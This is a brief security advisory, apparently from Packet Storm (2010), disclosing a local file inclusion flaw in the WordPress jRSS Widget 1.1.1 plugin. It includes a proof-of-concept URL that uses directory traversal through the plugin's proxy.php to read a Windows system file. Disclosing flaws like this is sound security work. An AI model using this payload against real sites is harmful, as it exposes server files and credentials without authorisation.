WordPress jRSS Widget 1.1.1 Local File Inclusion

2010-11-09T00:00:00
ID PACKETSTORM:95638
Type packetstorm
Reporter AutoSec Tools
Modified 2010-11-09T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................WordPress jRSS Widget 1.1.1  
Vulnerability...........Local File Inclusion  
Download................http://wordpress.org/extend/plugins/jrss-widget/  
Release Date............11/5/2010  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................John Leitch  
Site....................http://www.johnleitch.net/  
Email...................john.leitch5@gmail.com  
------------------------------------------------------------------------  
  
--Description--  
  
A local file inclusion vulnerability in WordPress jRSS Widget 1.1.1  
can be exploited to include arbitrary files.  
  
  
--PoC--  
  
http://localhost/wordpress/wp-content/plugins/jrss-widget/proxy.php?url=../../../../../../../../windows/win.ini  
`